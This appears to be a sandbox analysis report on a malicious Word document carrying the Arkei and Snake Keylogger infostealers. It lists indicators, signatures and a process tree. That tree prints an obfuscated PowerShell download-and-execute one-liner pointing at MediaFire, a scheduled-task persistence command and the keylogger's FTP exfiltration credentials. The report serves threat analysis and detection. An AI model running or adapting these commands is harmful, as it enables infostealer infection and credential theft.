Overview

overview

10

Static

static

Purchase O...).docx

windows7_x64

10

Purchase O...).docx

windows10-2004_x64

10

Analysis

  • max time kernel
    151s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    24-05-2022 19:08

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Purchase Order (Ref M050417).docx

  • Size

    169KB

  • MD5

    f3507e52fb0692a6fbac4afdc60b0f84

  • SHA1

    11ecc242faa42035b8a98e564b6a93eeaaf15338

  • SHA256

    21dcb10cb40e5357959aaed507513d8e04e72ba0e348c91288beeb8a00340c42

  • SHA512

    8f67a97360b12fc2cdd3bf0f24becc3c39719de58c93a52de47916a9a86445ab5ffb672d06f7be95604034aa3e0861bfa6f1a6a2f7a151179b46722a86716e67

Score
10/10
arkeisnakekeyloggerdefaultkeyloggerstealersuricata

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://www.mediafire.com/file/66qmupxl6a3kglz/12.dll/file

Extracted

Family

arkei

Botnet

Default

Extracted

Family

snakekeylogger

Credentials

  • Protocol:     ftp
  • Host:
    ftp://103.153.77.98/
  • Port:
    21
  • Username:
    jfhgjuere12
  • Password:
    hdhddjhfu1299

Signatures

  • Arkei

    Arkei is an infostealer written in C++.

    stealerarkei
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Snake Keylogger

    Keylogger and Infostealer first seen in November 2020.

    stealerkeyloggersnakekeylogger
  • Snake Keylogger Payload 3 IoCs
  • suricata: ET MALWARE Generic gate .php GET with minimal headers

    suricata: ET MALWARE Generic gate .php GET with minimal headers

    suricata
  • Blocklisted process makes network request 2 IoCs
  • Executes dropped EXE 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops file in System32 directory 4 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 9 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Enumerates system info in registry 2 TTPs 9 IoCs
  • Kills process with taskkill 3 IoCs
    evasion
  • Modifies system certificate store 2 TTPs 2 IoCs
    evasionspywaretrojan
  • Suspicious behavior: AddClipboardFormatListener 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of SetWindowsHookEx 17 IoCs
  • Suspicious use of WriteProcessMemory 60 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Purchase Order (Ref M050417).docx" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4872
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:3152
    • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
      "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" -Embedding
      1⤵
      • Checks processor information in registry
      • Enumerates system info in registry
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2140
      • C:\Windows\SYSTEM32\WSCRIPT.exe
        WSCRIPT C:\Users\Public\update.js
        2⤵
        • Process spawned unexpected child process
        PID:4216
    • C:\ProgramData\ddond.com
      C:\ProgramData\ddond.com https://www.mediafire.com/file/p4sw0y0ung9ic20/11.htm/file
      1⤵
      • Executes dropped EXE
      • Checks computer location settings
      • Modifies system certificate store
      • Suspicious use of WriteProcessMemory
      PID:1456
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $MMMMMMM=((n`e`W`-Obj`E`c`T (('Net'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'.'+'W'+'eb'+'c'+''+''+''+''+''+''+''+''+''+'lient'))).(('D'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'o'+'w'+'n'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'l'+'o'+'a'+'d'+'s'+'tri'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'n'+'g')).invoke((('https://www.mediafire.com/file/66qmupxl6a3kglz/12.dll/file'))));Invoke-Expression $MMMMMMM
        2⤵
        • Blocklisted process makes network request
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2360
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lokzhuqn\lokzhuqn.cmdline"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4212
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9073.tmp" "c:\Users\Admin\AppData\Local\Temp\lokzhuqn\CSC90B3E645FA40D481B453D5359E403D.TMP"
            4⤵
              PID:1792
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
            3⤵
              PID:764
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
              3⤵
              • Drops file in System32 directory
              PID:3452
            • C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe
              "C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe"
              3⤵
              • Drops file in System32 directory
              PID:4992
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
              3⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:2084
            • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
              "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"
              3⤵
                PID:4632
              • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
                "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"
                3⤵
                  PID:704
              • C:\Windows\System32\schtasks.exe
                "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 83 /tn calsaasdendersw /F /tr """C:\ProgramData\milon.com""""""https://www.mediafire.com/file/gvivg655kt9dd90/11.htm/file"""
                2⤵
                • Creates scheduled task(s)
                PID:2712
              • C:\Windows\System32\taskkill.exe
                "C:\Windows\System32\taskkill.exe" /f /im WinWord.exe
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:980
              • C:\Windows\System32\taskkill.exe
                "C:\Windows\System32\taskkill.exe" /f /im Excel.exe
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:4320
              • C:\Windows\System32\taskkill.exe
                "C:\Windows\System32\taskkill.exe" /f /im POWERPNT.exe
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:2212
            • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
              "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" -Embedding
              1⤵
              • Checks processor information in registry
              • Enumerates system info in registry
              • Suspicious behavior: AddClipboardFormatListener
              • Suspicious use of SetWindowsHookEx
              PID:5108

            Network

            MITRE ATT&CK Enterprise v6

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\ProgramData\ddond.com
              Filesize

              14KB

              MD5

              0b4340ed812dc82ce636c00fa5c9bef2

              SHA1

              51c97ebe601ef079b16bcd87af827b0be5283d96

              SHA256

              dba3137811c686fd35e418d76184070e031f207002649da95385dfd05a8bb895

              SHA512

              d9df8c1f093ea0f7bde9c356349b2ba43e3ca04b4c87c0f33ab89dda5afe9966313a09b60720aa22a1a25d43d7c71a060af93fb8f6488201a0e301c83fa18045

              Download Submit

            • C:\ProgramData\ddond.com
              Filesize

              14KB

              MD5

              0b4340ed812dc82ce636c00fa5c9bef2

              SHA1

              51c97ebe601ef079b16bcd87af827b0be5283d96

              SHA256

              dba3137811c686fd35e418d76184070e031f207002649da95385dfd05a8bb895

              SHA512

              d9df8c1f093ea0f7bde9c356349b2ba43e3ca04b4c87c0f33ab89dda5afe9966313a09b60720aa22a1a25d43d7c71a060af93fb8f6488201a0e301c83fa18045

              Download Submit

            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\80237EE4964FC9C409AAF55BF996A292_E503B048B745DFA14B81FCFC68D6DECE
              Filesize

              471B

              MD5

              67959c8297613f7ab757045cc4e57e61

              SHA1

              1ea5cfa474f59bf75379378c067531ad6677986d

              SHA256

              ec90b37e1c28505bc09f6e9974a8b34ddf7fcc9e8f7ed98c7db09628aa961625

              SHA512

              03ebaa7e41120648e6b5bc9cb20e7d69e35e9d5fb26beba60c870015b0dc81cdea1da7c2a558f1e15847fc43b78566eaf1752406de741319f55d7d4fe0fa3309

              Download Submit

            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_E503B048B745DFA14B81FCFC68D6DECE
              Filesize

              416B

              MD5

              bd290f0760a52f6662a26848ef957e53

              SHA1

              4e4a0d12b0a85eaff64a5cce0c24a4bd17a231e3

              SHA256

              04d3f4061d38997a538cce4836a1ef4c5f77138cabe0ed55f4757922affece42

              SHA512

              79faf051d531f6f5ce9982b06657f81e9fe733f64ee4b7919f09e4e6be24683c731a425b1bb83a6f84f73500820096c39c9d31ae5642eee4baa43a3fbe635942

              Download Submit

            • C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\A6DCAFEE-A9FF-4397-A591-E834B1A75A43
              Filesize

              145KB

              MD5

              3b3c452181e1a707509438582fbf75d2

              SHA1

              190e5247e7465588527dcdccb48c4434983007e8

              SHA256

              607d36b800b6f254efc24c6ba7ed6ae12f4cff39231d6903d57a6877fbd7cd03

              SHA512

              689f9f838d39644669b46682c58900edc0b41e4d83ab954afb4b05ebf00278faeaa2ab2ba5ec41496150202500e932c4527cb3fbd1c4809bcfe116be1117d966

              Download Submit

            • C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules.xml
              Filesize

              303KB

              MD5

              3775d965d0083409739f9e27918ec12a

              SHA1

              409fa9f4fe3d3810d5181e1ad9c0ee8bb556df48

              SHA256

              68f47c97290d8f5e8090c3552863ab12de0803f2da8c53cb0164cb18204f1031

              SHA512

              1f2623f9da2c3dfdd6b372671a8260bd52eb19a2ec9dfc561d551a5a33076d8e5df3818f7fcc58ebe196181471f034d314b8de3b6cba67b8acad4e2f81a5d015

              Download Submit

            • C:\Users\Admin\AppData\Local\Microsoft\Office\OTele\excel.exe.db
              Filesize

              4KB

              MD5

              f138a66469c10d5761c6cbb36f2163c3

              SHA1

              eea136206474280549586923b7a4a3c6d5db1e25

              SHA256

              c712d6c7a60f170a0c6c5ec768d962c58b1f59a2d417e98c7c528a037c427ab6

              SHA512

              9d25f943b6137dd2981ee75d57baf3a9e0ee27eea2df19591d580f02ec8520d837b8e419a8b1eb7197614a3c6d8793c56ebc848c38295ada23c31273daa302d9

              Download Submit

            • C:\Users\Admin\AppData\Local\Microsoft\Office\OTele\excel.exe.db-wal
              Filesize

              48KB

              MD5

              c8166f4123cf1820c7a220cd0c162b08

              SHA1

              9e47569fc1d4f31e2e89404fd58d812e0e74fcad

              SHA256

              3dd014046b1e414f30fcb5b70ec7d59b653a9a88967043dfaaae3f760d936736

              SHA512

              58b15736f737be5e74b37ca12f146d640937c533da0910b69c0586e73917aba3aa2cf4cce79569340481d9ac3f29eb7bb265776d7b0ab9bcabef3b6fc92fa480

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\RES9073.tmp
              Filesize

              1KB

              MD5

              1639723d6bbea65e25dc45da667432cc

              SHA1

              5d312928e2d912be72312b02caf4b08bd611c0fd

              SHA256

              bbbe0b01ccdea5dfd09693b5d3c05b3bd245219933d843e4891e97ad0ac6c85d

              SHA512

              84e40a3ebad2112ae68d14c10dee57d53143c4f5085128f425fbcab9c23b0c9ebc7c00fdf21b55d833cbad61a129ad3b23396c15a6bbcdfbf4aca7922cf28d1b

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\lokzhuqn\lokzhuqn.dll
              Filesize

              3KB

              MD5

              c31656411938a4580cb1eea284b18f41

              SHA1

              e69ad9d25bd3db70d582b7593e83cb19e968778c

              SHA256

              80e9aeb36f5ce03f569acabbece4b3cd47d85c3130a85c511c5ad1a97798ca04

              SHA512

              9b863740c28b89b683abe87df6ad1f1183663a12bfdce8ccacca56f691f3ca38f156c8fe19b5afceb24bb550acae55d5590b4dff9fd952267a6f3a788b2a498c

              Download Submit

            • C:\Users\Public\update.js
              Filesize

              4KB

              MD5

              ce4bb33999f34d057959725ce8d028ba

              SHA1

              85b6ed8ded31a2870fe96a556e1594782daabf46

              SHA256

              f149e789ea4ef38502f65f6e6055d471f4feea132e4d90d41df721552f47efe4

              SHA512

              704afb2acc6c6c3fb78cb1df38a8cffe83d7bee8b69ae7d44fa74128720739b005229a9b9968b469a70143244e0dc86480fddf1aabb980501894c1d9f5596d5b

              Download Submit

            • \??\c:\Users\Admin\AppData\Local\Temp\lokzhuqn\CSC90B3E645FA40D481B453D5359E403D.TMP
              Filesize

              652B

              MD5

              bdc93d04c0121299f338726cc9782b20

              SHA1

              36b93224e9157aedcb584031449d94bde331beae

              SHA256

              2ee57205a4aa99f6be7ae8a2f4a20768be54f24aa69902fc11c91cee933f24d5

              SHA512

              90e7b6b5ff68ec8ab02789d9db2f742aa67203e0a8e0b3fc0c3f1c7fe6912d4364401ed99d702cc2e142a6829e8f7c8f9fbad2a56cc1430d07eab48383be4703

              Download Submit

            • \??\c:\Users\Admin\AppData\Local\Temp\lokzhuqn\lokzhuqn.0.cs
              Filesize

              840B

              MD5

              268033bad46157d9949101dfdbd69f95

              SHA1

              14a7532c9470d058536ff71251abc55320dee08e

              SHA256

              17b8a040220f09bb5eeb9530460b8e7ab64eafabef7623dec029158d9f7faf7f

              SHA512

              09c43d5277e41983127be6fc2b915ff506e461a8847b4bd25446d1b7db63085f59fb5c342771bf730b913aa46150912919190c86960d33d96d4c513163f0068b

              Download Submit

            • \??\c:\Users\Admin\AppData\Local\Temp\lokzhuqn\lokzhuqn.cmdline
              Filesize

              369B

              MD5

              24c4ced131f1b65d1171cb681c28f7a2

              SHA1

              7e2fcc6ca0b7fdac26fcd4b36e488c1ff1897772

              SHA256

              2398feb1e843be4362609071ca08a902e1e6eabaf04ce67358430120b692c729

              SHA512

              7f6190f9c5a4ae8b885545fab506ad4f12a62fa70f614f397665290193abc14705cff7d7f835eb724cecedad3800695d3c022b2e9eeef49392ba571179eb234b

              Download Submit

            • memory/704-196-0x0000000073F50000-0x0000000074501000-memory.dmp

              Filesize

              5.7MB

              Download

            • memory/2084-192-0x0000000000400000-0x000000000047C000-memory.dmp

              Filesize

              496KB

              Download

            • memory/2084-197-0x0000000005810000-0x0000000005DB4000-memory.dmp

              Filesize

              5.6MB

              Download

            • memory/2084-236-0x0000000005260000-0x00000000052FC000-memory.dmp

              Filesize

              624KB

              Download

            • memory/2360-164-0x00007FFE0FA20000-0x00007FFE104E1000-memory.dmp

              Filesize

              10.8MB

              Download

            • memory/2360-154-0x0000020348180000-0x00000203481A2000-memory.dmp

              Filesize

              136KB

              Download

            • memory/3452-187-0x0000000000400000-0x000000000043D000-memory.dmp

              Filesize

              244KB

              Download

            • memory/3452-184-0x0000000000400000-0x000000000043D000-memory.dmp

              Filesize

              244KB

              Download

            • memory/3452-198-0x0000000060900000-0x0000000060992000-memory.dmp

              Filesize

              584KB

              Download

            • memory/3452-177-0x0000000000400000-0x000000000043D000-memory.dmp

              Filesize

              244KB

              Download

            • memory/4872-132-0x00007FFDFDCD0000-0x00007FFDFDCE0000-memory.dmp

              Filesize

              64KB

              Download

            • memory/4872-131-0x00007FFDFDCD0000-0x00007FFDFDCE0000-memory.dmp

              Filesize

              64KB

              Download

            • memory/4872-136-0x00007FFDFB8B0000-0x00007FFDFB8C0000-memory.dmp

              Filesize

              64KB

              Download

            • memory/4872-135-0x00007FFDFB8B0000-0x00007FFDFB8C0000-memory.dmp

              Filesize

              64KB

              Download

            • memory/4872-130-0x00007FFDFDCD0000-0x00007FFDFDCE0000-memory.dmp

              Filesize

              64KB

              Download

            • memory/4872-134-0x00007FFDFDCD0000-0x00007FFDFDCE0000-memory.dmp

              Filesize

              64KB

              Download

            • memory/4872-133-0x00007FFDFDCD0000-0x00007FFDFDCE0000-memory.dmp

              Filesize

              64KB

              Download

            • memory/4992-186-0x0000000000400000-0x000000000043D000-memory.dmp

              Filesize

              244KB

              Download

            • memory/5108-166-0x00007FFDFB8B0000-0x00007FFDFB8C0000-memory.dmp

              Filesize

              64KB

              Download

            • memory/5108-163-0x00007FFDFB8B0000-0x00007FFDFB8C0000-memory.dmp

              Filesize

              64KB

              Download

            • memory/5108-190-0x00007FFDFDCD0000-0x00007FFDFDCE0000-memory.dmp

              Filesize

              64KB

              Download

            • memory/5108-191-0x00007FFDFDCD0000-0x00007FFDFDCE0000-memory.dmp

              Filesize

              64KB

              Download

            • memory/5108-189-0x00007FFDFDCD0000-0x00007FFDFDCE0000-memory.dmp

              Filesize

              64KB

              Download

            • memory/5108-188-0x00007FFDFDCD0000-0x00007FFDFDCE0000-memory.dmp

              Filesize

              64KB

              Download